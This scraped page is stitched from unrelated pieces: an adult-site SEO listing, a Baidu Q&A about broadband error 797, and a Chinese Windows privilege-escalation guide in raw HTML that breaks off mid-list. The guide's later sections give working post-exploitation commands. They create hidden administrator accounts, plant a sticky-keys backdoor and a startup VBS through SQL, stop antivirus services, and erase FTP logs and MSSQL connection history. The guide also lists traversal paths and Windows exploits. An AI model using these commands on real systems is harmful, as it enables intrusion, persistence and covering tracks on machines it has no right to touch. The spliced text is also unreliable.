为啥www797vv不显示,什么时候797vv可以com正常啊

未找到信息!
未找到信息!
收录 / 索引信息
未找到信息!
WWW.06PPP.COM_WWW.797VV.COM-成人专区
一般不超过80字符
网站关键词
WWW.06PPP.COM_WWW.797VV.COM-成人专区
一般不超过100字符
WWW.06PPP.COM_WWW.797VV.COM-成人专区致力打造于男人爱看的大片,感谢对WWW.06PPP.COM_WWW.797VV.COM的支持,有你我们才会更精彩!
一般不超过200字符
同主机安全
虚假或欺诈网站
挂马或恶意网站
未存在违规内容
alexa排名趋势
服务器信息
服务器类型
源文件大小
压缩后大小
最后修改时间
关闭关闭关闭联通宽带连接不上,显示797_百度知道
联通宽带连接不上,显示797
我们宿舍接了联通的网线。但是别人接上网线都直接输入用户名密码都能用了,可我就上不了。而且我前几个星期在家也能连上。看其他回答,我看我电脑上设备管理器上的网络适配器的几个WAN微型端口确实显示有黄色感叹号标志,说要卸载安装什么的我也不会弄,摁卸载...
win8...今天发现连wifi也连不上了,网络适配器里面wifi是已启用的,飞行模式也没开
我有更好的答案
连接网络出现797错误的,是电脑adsl moden连接设备未找到连接不上的情况,导致网卡和adsl modem的连接出了故障,在创建连接拨号的时候,创建了一个错误连接。 解决方法如下:1.首先检查电脑和猫的电源和电源连接线。检测网络的属性及raspppoe相关的协议是否安装正确,并且将其正常绑定相关协议。2.检测网卡驱动上是否出现感叹号或者问号的情况,将其设置为检查拨号连接的属性。3.查看是否连接的设备使用了一个isdn channel-adapter name(xx) 的设备,如果是的话,这个设备是的空的设备所有就会连接不上网络出现错误797的情况了。4.将设备取消,然后使用正确的pppoe设备即可解决,也可以重新创建拨号连接即可。 5.TCP/IP协议出现问题,要是有备份可以恢复一下,或者重新装一下相关协议。6.如果自己修复不了的话就找宽带服务人员来上门服务了。
冲浪网站优化网总经理
。别的是不可以的哦。网卡驱动。。。先重启一下电脑。?有说明 驱动没有安装正确。。一定网卡驱动的哦。。。。。看看还有没有黄色感叹号标志?。。进入系统后看看有没有发再新硬件,。。和找不到网卡。。再打开设备管理器。还有你的是什么系统。。。下一个带网卡驱动的驱动精灵试试安装吧。。可以在别的机子上网。重新装网卡驱动吧,,,797是说明网卡禁用,会不会自动安装驱动,因为驱动精灵别的是要连网才可以用的,,
……上不了网怎么下载啊,
在别的机子下载好。。。用U盘复制。。到你电脑上安装
刚我试了,去官网下了,还是不行,是我保存的盘不对吗?我存在D盘
拍设备管理的图片给我看看。。。。。是什么的机子。。型号。。。我帮找一个,,你放在D盘可以啊,,你要接装网卡驱动啊。。。下对驱动才可以安装的。。WIN7有32位的。。64位。。。。XP一般是32位。。你下对了没有
联想G480WIN8 64位。确定下对了驱动。安装了驱动精灵100多M的扩展版也无济于事。怎么给你看照片?貌似百度知道发不了?
有私信吗。。
本回答被提问者和网友采纳
号故障出现797错误,没有正确的安装网卡或者网卡驱动程序丢失,解决方法,然后下载安装吧:请您重新正确安装网卡就可以解决。如果你是小白的话,估计你自己弄不好的,网卡没插好基本没可能,当然还有其他办法检测你的硬件,也得下载安装啊,不知道你能弄懂哪个呢,驱动出问题了,去笔记本网站查找你的电脑型号
上不了网怎么下
在别的机子下载好。。。用U盘复制。。到你电脑上安装
刚我试了,并且安装,还是不行
宽带上网显示“错误797”,是因为宽带连接问题引起,建议重启电脑,重新创建宽带拨号连接再试,如仍无法解决,建议重装电脑系统。
打10010问他们喽
是电脑问题和网无关
其他2条回答
为您推荐:
其他类似问题
您可能关注的内容
联通宽带的相关知识
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。&figure&&img src=&https://pic3.zhimg.com/v2-33d8bcc0cf5d208f1aa797_b.jpg& data-rawwidth=&720& data-rawheight=&376& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic3.zhimg.com/v2-33d8bcc0cf5d208f1aa797_r.jpg&&&/figure&&p&&b&怪狗提示,值得收藏与分享!&/b&&/p&&p&&br&&/p&&p&&b&介绍 &/b&&/p&&p&windows提权总是被归结为适当的枚举。但要完成适当的枚举,你需要知道要检查和查找的内容。这通常需要伴随着经验的丰富而对系统非常熟悉。起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常的东西,而哪些不是正常的东西。最终变得更容易,因为你知道要寻找什么了,而不是挖掘希望在干草堆中找到那根针的所有东西。希望本指南能为你的入门提供良好的基础知识。&/p&&p&&br&&/p&&p&所以本指南主要集中在枚举方面。&/p&&p&注:我不是专家,仍然在学习当中。&/p&&p&&br&&/p&&p&&b&指南概述&/b&&/p&&p&在每个部分中,我首先提供老的可靠的CMD命令,然后是一个Powershell实现的的等价命令。同时拥有这两种工具是非常好的,Powershell比传统的CMD更加灵活。然而,没有一个Powershell命令能等价于所有东西(或者CMD在某些事情上仍然更简单更好),所以一些部分将只包含常规的CMD命令。&/p&&p&&br&&/p&&p&&b&命令了解操作系统类型和架构?它是否缺少任何补丁?&/b&&/p&&p&systeminfo&/p&&p&wmic qfe&/p&&p&&br&&/p&&p&&b&环境变量有什么有趣的地方吗?域控制器在LOGONSERVER?&/b&&/p&&p&set&/p&&p&Get-ChildItem Env: | ft Key,Value&/p&&p&&br&&/p&&p&&b&有没有其他连接的驱动器?&/b&&/p&&p&net use&/p&&p&wmic logicaldisk get caption,description,providername&/p&&p&Get-PSDrive | where {$_.Provider -like &Microsoft.PowerShell.Core\FileSystem&}| ft Name,Root&/p&&p&&br&&/p&&p&&b&用户,你是谁?&/b& &/p&&p&whoami&/p&&p&echo %USERNAME%&/p&&p&$env:UserName&/p&&p&&br&&/p&&p&&b&系统上有哪些用户?任何旧的用户配置文件没有被清理掉?&/b& &/p&&p&net users&/p&&p&dir /b /ad &C:\Users\&&/p&&p&dir /b /ad &C:\Documents and Settings\& # Windows XP and below&/p&&p&Get-LocalUser | ft Name,Enabled,LastLogon&/p&&p&Get-ChildItem C:\Users -Force | select Name&/p&&p&&br&&/p&&p&&b&是否有其他人登录?&/b& &/p&&p&qwinsta&/p&&p&&br&&/p&&p&&b&系统上有哪些用户组?&/b& &/p&&p&net localgroup&/p&&p&Get-LocalGroup | ft Name&/p&&p&&br&&/p&&p&&b&在管理员组中有哪些用户?&/b&&/p&&p&net localgroup Administrators&/p&&p&Get-LocalGroupMember Administrators | ft Name, PrincipalSource&/p&&p&&br&&/p&&p&&b&用户自动登录对应的注册表中有些什么内容?&/b& &/p&&p&reg query &HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon& 2&nul | findstr &DefaultUserName DefaultDomainName DefaultPassword&&/p&&p&Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select &Default*&&/p&&p&&br&&/p&&p&&b&Credential Manager中有什么有趣的东西?&/b&&/p&&p&cmdkey /list&/p&&p&&br&&/p&&p&&b&我们可以访问SAM和SYSTEM文件吗?&/b&&/p&&p&%SYSTEMROOT%\repair\SAM&/p&&p&%SYSTEMROOT%\System32\config\RegBack\SAM&/p&&p&%SYSTEMROOT%\System32\config\SAM&/p&&p&%SYSTEMROOT%\repair\system&/p&&p&%SYSTEMROOT%\System32\config\SYSTEM&/p&&p&%SYSTEMROOT%\System32\config\RegBack\system&/p&&p&&br&&/p&&p&&b&程序,进程和服务,系统都安装了些什么软件?&/b&&/p&&p&dir /a &C:\Program Files&&/p&&p&dir /a &C:\Program Files (x86)&&/p&&p&reg query HKEY_LOCAL_MACHINE\SOFTWARE&/p&&p&Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime&/p&&p&Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name&/p&&p&&br&&/p&&p&&b&有没有权限设置的比较脆弱的文件夹或文件的权限?&/b&&/p&&p&&b&在程序文件夹中(Program Folders)有哪些文件或文件夹赋予了所有人(Everyone)或用户(User)的完全权限?&/b& &/p&&p&icacls &C:\Program Files\*& 2&nul | findstr &(F)& | findstr &Everyone&&/p&&p&icacls &C:\Program Files (x86)\*& 2&nul | findstr &(F)& | findstr &Everyone&&/p&&p&icacls &C:\Program Files\*& 2&nul | findstr &(F)& | findstr &BUILTIN\Users&&br&&/p&&p&icacls &C:\Program Files (x86)\*& 2&nul | findstr &(F)& | findstr &BUILTIN\Users&&/p&&p&&br&&/p&&p&&b&修改程序文件夹(Program Folders)中的所有人(Everyone)或用户(User)的权限?&/b&&/p&&p&icacls &C:\Program Files\*& 2&nul | findstr &(M)& | findstr &Everyone&&/p&&p&icacls &C:\Program Files (x86)\*& 2&nul | findstr &(M)& | findstr &Everyone&&/p&&p&icacls &C:\Program Files\*& 2&nul | findstr &(M)& | findstr &BUILTIN\Users&&/p&&p&icacls &C:\Program Files (x86)\*& 2&nul | findstr &(M)& | findstr &BUILTIN\Users&&/p&&p&Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}&/p&&p&Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}&/p&&p&&br&&/p&&p&&b&你也可以上传Sysinternals中的accesschk来检查可写文件夹和文件。&/b& &/p&&p&accesschk.exe -qwsu &Everyone& *&/p&&p&accesschk.exe -qwsu &Authenticated Users& *&/p&&p&accesschk.exe -qwsu &Users& *&/p&&p&&br&&/p&&p&&b&系统上正在运行的进程/服务有哪些?有没有暴露的内部服务?如果是这样,我们可以打开它吗?请参阅附录中的端口转发。&/b& &/p&&p&tasklist /svc&/p&&p&tasklist /v&/p&&p&net start&/p&&p&sc query&/p&&p&Get-Process | ft ProcessName,Id&br&&/p&&p&Get-Service&/p&&p&&br&&/p&&p&&b&是否存在任何脆弱的服务权限?我们可以重新配置什么吗?你可以再次上传accesschk来检查权限。&/b&&/p&&p&accesschk.exe -uwcqv &Everyone& *&/p&&p&accesschk.exe -uwcqv &Authenticated Users& *&/p&&p&accesschk.exe -uwcqv &Users& *&/p&&p&&br&&/p&&p&&b&有没有引用的服务路径?&/b& &/p&&p&wmic service get name,displayname,pathname,startmode 2&nul |findstr /i &Auto& 2&nul |findstr /i /v &C:\Windows\\& 2&nul |findstr /i /v &&&&/p&&p&&br&&/p&&p&&b&是否设置了计划任务?任何自定义实现的计划任务?&/b&&/p&&p&schtasks /query /fo LIST 2&nul | findstr TaskName&/p&&p&dir C:\windows\tasks&/p&&p&Get-ScheduledTask | ft TaskName, State&/p&&p&&br&&/p&&p&&b&系统启动时都运行了些什么?&/b&&/p&&p&wmic startup get caption,command&/p&&p&reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&/p&&p&reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce&/p&&p&reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run&/p&&p&reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&/p&&p&dir &C:\Documents and Settings\All Users\Start Menu\Programs\Startup&&/p&&p&dir &C:\Documents and Settings\%username%\Start Menu\Programs\Startup&&/p&&p&&br&&/p&&p&Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl&/p&&p&Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'&/p&&p&Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'&/p&&p&Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'&/p&&p&Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'&/p&&p&Get-ChildItem &C:\Users\All Users\Start Menu\Programs\Startup&&/p&&p&Get-ChildItem &C:\Users\$env:USERNAME\Start Menu\Programs\Startup&&/p&&p&&br&&/p&&p&&b&AlwaysInstallElevated是否启用?我没有跑过这个,但没有伤害检查&/b&。&br&&/p&&p&reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated&/p&&p&&br&&/p&&p&&b&网络连接到了哪一块网卡?是否有多个网络?&/b&&/p&&p&ipconfig /all&/p&&p&Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address&/p&&p&&br&&/p&&p&&b&我们有哪些网络路线?&/b& &/p&&p&route print&/p&&p&Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex&/p&&p&&br&&/p&&p&&b&ARP缓存中有什么?&/b& &/p&&p&arp -a&/p&&p&Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State&/p&&p&&br&&/p&&p&&b&是否有连接到其他主机的网络连接?&/b& &/p&&p&netstat -ano&/p&&p&&br&&/p&&p&&b&hosts文件中的有什么东西?&/b& &/p&&p&C:\WINDOWS\System32\drivers\etc\hosts&/p&&p&&br&&/p&&p&&b&防火墙是否打开?如果是又是怎样配置的?&/b&&/p&&p&netsh firewall show state&/p&&p&netsh firewall show config&/p&&p&netsh advfirewall firewall show rule name=all&/p&&p&netsh advfirewall export &firewall.txt&&/p&&p&&br&&/p&&p&&b&任何其他有趣的接口配置?&/b&&/p&&p&netsh dump&/p&&p&&br&&/p&&p&&b&有没有SNMP配置?&/b&&/p&&p&reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s&/p&&p&Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse&/p&&p&&br&&/p&&p&&b&有趣的文件和敏感信息&/b&&/p&&p&&br&&/p&&p&这部分内容的命令输出可能有点杂乱,所以你可能想把命令的输出重定向到txt文件中进行审查和解析。&/p&&p&&br&&/p&&p&&b&在注册表中是否有任何密码?&/b&&/p&&p&reg query HKCU /f password /t REG_SZ /s&/p&&p&reg query HKLM /f password /t REG_SZ /s&/p&&p&&br&&/p&&p&&b&查看是否存在没有清理掉的sysprep或unattended文件?&/b&&/p&&p&dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2&nul&/p&&p&Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like &*.xml& -or $_.Name -like &*.txt& -or $_.Name -like &*.ini&)}&/p&&p&&br&&/p&&p&&b&如果服务器是IIS网络服务器,那么inetpub中有什么?以及任何隐藏的目录?web.config文件?&/b&&/p&&p&dir /a C:\inetpub\&/p&&p&dir /s web.config&/p&&p&C:\Windows\System32\inetsrv\config\applicationHost.config&/p&&p&Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue&/p&&p&&br&&/p&&p&&b&在IIS日志目录中有些什么文件?&/b&&/p&&p&C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log&/p&&p&C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log&/p&&p&C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log&/p&&p&C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log&/p&&p&&br&&/p&&p&&b&是否安装了XAMPP,Apache或PHP?任何有XAMPP,Apache或PHP配置文件?&/b&&/p&&p&dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf&/p&&p&Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue&/p&&p&&br&&/p&&p&&b&系统中是否存在任何Apache网络日志?&/b&&/p&&p&dir /s access.log error.log&/p&&p&Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue&/p&&p&&br&&/p&&p&&b&系统中是否任何有趣的文件?可能在用户目录(桌面,文档等)?&/b&&/p&&p&dir /s *pass* == *vnc* == *.config* 2&nulGet-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue&/p&&p&&br&&/p&&p&系统中是否有包含密码的文件?&/p&&p&findstr /si password *.xml *.ini *.txt *.config 2&nul&/p&&p&Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern &password&&/p&&p&&b&cmd 下操作VPN 相关知识,资料:&/b&&/p&&p&#允许administrator拨入该VPN:&br&&/p&&p&netsh ras set user administrator permit&/p&&p&&br&&/p&&p&#禁止administrator拨入该VPN:&/p&&p&netsh ras set user administrator deny&/p&&p&&br&&/p&&p&#查看哪些用户可以拨入VPN:&/p&&p&netsh ras show user&/p&&p&&br&&/p&&p&#查看VPN分配IP的方式:&/p&&p&netsh ras ip show config&/p&&p&&br&&/p&&p&#使用地址池的方式分配IP:&/p&&p&netsh ras ip set addrassign method = pool&/p&&p&#地址池的范围是从192.168.3.1到192.168.3.254:&/p&&p&netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254&/p&&p&&br&&/p&&p&&b&Cmd、Dos 命令行下添加 SQL 用户的方法:&/b&&/p&&p&&br&&/p&&p&需要有管理员权限,在命令下先建立一个“c:\test.qry”文件,内容如下:&/p&&p&exec master.dbo.sp_addlogin test,123&/p&&p&EXEC sp_addsrvrolemember 'test, 'sysadmin'&/p&&p&然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry&/p&&p&&br&&/p&&p&&b&另类的加用户方法:&/b&&/p&&p&&br&&/p&&p&在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下:&/p&&p&&br&&/p&&p&js:&/p&&p&var o=new ActiveXObject( &Shell.Users& ); &/p&&p&z=o.create(&test&) ; &/p&&p&z.changePassword(&123456&,&&) &/p&&p&z.setting(&AccountType&)=3; &/p&&p&vbs: &/p&&p&view source &/p&&p&Set o=CreateObject( &Shell.Users& ) &/p&&p&Set z=o.create(&test&) &/p&&p&z.changePassword &123456&,&& &/p&&p&z.setting(&AccountType&)=3 &/p&&p&&br&&/p&&p&&b&Cmd 访问控制权限控制:&/b&&/p&&p&&br&&/p&&p&命令如下:&/p&&p&cacls c: /e /t /g everyone:F
#c盘everyone权限 &/p&&p&cacls &目录& /d everyone
#everyone不可读,包括admin &/p&&p&&br&&/p&&p&备注:&/p&&p&&br&&/p&&p&反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 – 文件夹选项 – 使用简单的共享去掉即可。&/p&&p&&br&&/p&&p&&b&3389 相关,以下配合PR更好:&/b&&/p&&p&&br&&/p&&p&a、防火墙TCP/IP筛选.(关闭:net stop policyagent & net stop sharedaccess)&/p&&p&&br&&/p&&p&b、内网环境(lcx.exe)&/p&&p&&br&&/p&&p&c、终端服务器超出了最大允许连接(XP 运行:mstsc /2003 运行:mstsc /console)&/p&&p&&br&&/p&&p&&b&1.查询终端端口:&/b&&/p&&p&REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal& &Server\WinStations\RDP-Tcp /v PortNumber&/p&&p&&br&&/p&&p&&b&2.开启XP&2003终端服务:&/b&&/p&&p&REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal& &Server /v fDenyTSConnections /t REG_DWORD /d
/f&/p&&p&&br&&/p&&p&&b&3.更改终端端口为2008(十六进制为:0x7d8):&/b&&/p&&p&REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal& &Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f&/p&&p&REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal& &Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f&/p&&p&&br&&/p&&p&&b&4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:&/b&&/p&&p&REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f&/p&&p&create table a (cmd text); &/p&&p&insert into a values (&set wshshell=createobject (&&wscript.shell&&)&); &/p&&p&insert into a values (&a=wshshell.run (&&cmd.exe /c net user admin admin /add&&,0)&); &/p&&p&insert into a values (&b=wshshell.run (&&cmd.exe /c net localgroup administrators admin /add&&,0)&); &/p&&p&select * from a into outfile &C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs&; &/p&&p&&br&&/p&&p&&br&&/p&&p&BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能)&/p&&p&&br&&/p&&p&关闭常见杀软(把杀软所在的文件的所有权限去掉):&/p&&p&&br&&/p&&p&&b&处理变态诺顿企业版:&/b&&/p&&p&&br&&/p&&p&net stop &Symantec AntiVirus& /y &/p&&p&net stop &Symantec AntiVirus Definition Watcher& /y &/p&&p&net stop &Symantec Event Manager& /y &/p&&p&net stop &System Event Notification& /y &/p&&p&net stop &Symantec Settings Manager& /y &/p&&p&&br&&/p&&p&&b&麦咖啡:&/b&&/p&&p&net stop &McAfee McShield& &/p&&p&&br&&/p&&p&&b&Symantec病毒日志:&/b&&/p&&p&C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs &/p&&p&&br&&/p&&p&&b&Symantec病毒备份:&/b&&/p&&p&C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine &/p&&p&&br&&/p&&p&&b&Nod32病毒备份:&/b&&/p&&p&C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine &/p&&p&&br&&/p&&p&&b&Nod32移除密码保护:&/b&&/p&&p&&br&&/p&&p&删除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即可&/p&&p&&br&&/p&&p&&b&安装5次shift后门,沾滞键后门,替换SHIFT后门:&/b&&/p&&p&&br&&/p&&p&5次SHIFT,沾滞键后门:&/p&&p&&br&&/p&&p&copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe &/p&&p&copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y &/p&&p&copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y &/p&&p&&br&&/p&&p&&b&替换SHIFT后门:&/b&&/p&&p&attrib c:\windows\system32\sethc.exe -h -r -s &/p&&p&attrib c:\windows\system32\dllcache\sethc.exe -h -r -s &/p&&p&del c:\windows\system32\sethc.exe &/p&&p&copy c:\windows\explorer.exe c:\windows\system32\sethc.exe &/p&&p&copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe &/p&&p&attrib c:\windows\system32\sethc.exe +h +r +s &/p&&p&attrib c:\windows\system32\dllcache\sethc.exe +h +r +s &/p&&p&&br&&/p&&p&&b&添加隐藏系统账号:&/b&&/p&&p&&br&&/p&&p&1、执行命令:&/p&&p&“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。&/p&&p&2、导出注册表SAM下用户的两个键值。&/p&&p&&br&&/p&&p&3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去。&/p&&p&&br&&/p&&p&4、利用 Hacker Defender 把相关用户注册表隐藏。&/p&&p&&br&&/p&&p&&b&安装 MSSQL 扩展后门:&/b&&/p&&p&USE &/p&&p&EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll'; &/p&&p&GRANT exec On xp_helpsystem TO &/p&&p&&br&&/p&&p&处理服务器MSFTP日志:&/p&&p&&br&&/p&&p&在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log / ex011124.log 三个文件,直接删除 ex0111124.log 不成功,显示“原文件…正在使用”。&/p&&p&&br&&/p&&p&当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。&/p&&p&&br&&/p&&p&当停止“msftpsvc”服务后可直接删除“ex011124.log”。&/p&&p&&br&&/p&&p&&b&MSSQL查询分析器连接记录清除:&/b&&/p&&p&&br&&/p&&p&MSSQL 2000 位于注册表如下:&/p&&p&&br&&/p&&p&HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers&/p&&p&找到接接过的信息删除。&/p&&p&&br&&/p&&p&MSSQL 2005 是在:&/p&&p&&br&&/p&&p&C:\Documents and Settings\\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat&/p&&p&&br&&/p&&p&&b&各种网站的配置文件相对路径大全:&/b&&/p&&p&/config.php&br&&/p&&p&../../config.php&/p&&p&../config.php&/p&&p&../../../config.php&/p&&p&/config.inc.php&/p&&p&./config.inc.php&/p&&p&../../config.inc.php&/p&&p&../config.inc.php&/p&&p&../../../config.inc.php&/p&&p&/conn.php&/p&&p&./conn.php&/p&&p&../../conn.php&/p&&p&../conn.php&/p&&p&../../../conn.php&/p&&p&/conn.asp&/p&&p&./conn.asp&/p&&p&../../conn.asp&/p&&p&../conn.asp&/p&&p&../../../conn.asp&/p&&p&/config.inc.php&/p&&p&./config.inc.php&/p&&p&../../config.inc.php&/p&&p&../config.inc.php&/p&&p&../../../config.inc.php&/p&&p&/config/config.php&/p&&p&../../config/config.php&/p&&p&../config/config.php&/p&&p&../../../config/config.php&/p&&p&/config/config.inc.php&/p&&p&./config/config.inc.php&/p&&p&../../config/config.inc.php&/p&&p&../config/config.inc.php&/p&&p&../../../config/config.inc.php&/p&&p&/config/conn.php&/p&&p&./config/conn.php&/p&&p&../../config/conn.php&/p&&p&../config/conn.php&/p&&p&../../../config/conn.php&/p&&p&/config/conn.asp&/p&&p&./config/conn.asp&/p&&p&../../config/conn.asp&/p&&p&../config/conn.asp&/p&&p&../../../config/conn.asp&/p&&p&/config/config.inc.php&/p&&p&./config/config.inc.php&/p&&p&../../config/config.inc.php&/p&&p&../config/config.inc.php&/p&&p&../../../config/config.inc.php&/p&&p&/data/config.php&/p&&p&../../data/config.php&/p&&p&../data/config.php&/p&&p&../../../data/config.php&/p&&p&/data/config.inc.php&/p&&p&./data/config.inc.php&/p&&p&../../data/config.inc.php&/p&&p&../data/config.inc.php&/p&&p&../../../data/config.inc.php&/p&&p&/data/conn.php&/p&&p&./data/conn.php&/p&&p&../../data/conn.php&/p&&p&../data/conn.php&/p&&p&../../../data/conn.php&/p&&p&/data/conn.asp&/p&&p&./data/conn.asp&/p&&p&../../data/conn.asp&/p&&p&../data/conn.asp&/p&&p&../../../data/conn.asp&/p&&p&/data/config.inc.php&/p&&p&./data/config.inc.php&/p&&p&../../data/config.inc.php&/p&&p&../data/config.inc.php&/p&&p&../../../data/config.inc.php&/p&&p&/include/config.php&/p&&p&../../include/config.php&/p&&p&../include/config.php&/p&&p&../../../include/config.php&/p&&p&/include/config.inc.php&/p&&p&./include/config.inc.php&/p&&p&../../include/config.inc.php&/p&&p&../include/config.inc.php&/p&&p&../../../include/config.inc.php&/p&&p&/include/conn.php&/p&&p&./include/conn.php&/p&&p&../../include/conn.php&/p&&p&../include/conn.php&/p&&p&../../../include/conn.php&/p&&p&/include/conn.asp&/p&&p&./include/conn.asp&/p&&p&../../include/conn.asp&/p&&p&../include/conn.asp&/p&&p&../../../include/conn.asp&/p&&p&/include/config.inc.php&/p&&p&./include/config.inc.php&/p&&p&../../include/config.inc.php&/p&&p&../include/config.inc.php&/p&&p&../../../include/config.inc.php&/p&&p&/inc/config.php&/p&&p&../../inc/config.php&/p&&p&../inc/config.php&/p&&p&../../../inc/config.php&/p&&p&/inc/config.inc.php&/p&&p&./inc/config.inc.php&/p&&p&../../inc/config.inc.php&/p&&p&../inc/config.inc.php&/p&&p&../../../inc/config.inc.php&/p&&p&/inc/conn.php&/p&&p&./inc/conn.php&/p&&p&../../inc/conn.php&/p&&p&../inc/conn.php&/p&&p&../../../inc/conn.php&/p&&p&/inc/conn.asp&/p&&p&./inc/conn.asp&/p&&p&../../inc/conn.asp&/p&&p&../inc/conn.asp&/p&&p&../../../inc/conn.asp&/p&&p&/inc/config.inc.php&/p&&p&./inc/config.inc.php&/p&&p&../../inc/config.inc.php&/p&&p&../inc/config.inc.php&/p&&p&../../../inc/config.inc.php&/p&&p&/index.php&/p&&p&./index.php&/p&&p&../../index.php&/p&&p&../index.php&/p&&p&../../../index.php&/p&&p&/index.asp&/p&&p&./index.asp&/p&&p&../../index.asp&/p&&p&../index.asp&/p&&p&../../../index.asp&/p&&p&&br&&/p&&p&&b&大牛总结的Window提权Exp合集&/b&&/p&&p&&br&&/p&&p&漏洞列表&/p&&p&&br&&/p&&p&#Security Bulletin
#Description
#Operating System&/p&&p&CVE-  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/08)&/p&&p&MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7//XP)&/p&&p&MS16-135  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)&/p&&p&MS16-098  [KB3178466]  [Kernel Driver]  (Win 8.1)&/p&&p&MS16-075  [KB3164038]  [Hot Potato]  (/8/2012)&/p&&p&MS16-032  [KB3143141]  [Secondary Logon Handle]  (/10/2012)&/p&&p&MS16-016  [KB3136041]  [WebDAV]  (2008/Vista/7)&/p&&p&MS15-097  [KB3089656]  [remote code execution]  (win8.1/2012)&/p&&p&MS15-076  [KB3067505]  [RPC]  (/8/2012)&/p&&p&MS15-077  [KB3077657]  [ATM]  (XP/Vista/Win7/Win8/08/2012)&/p&&p&MS15-061  [KB3057839]  [Kernel Driver]  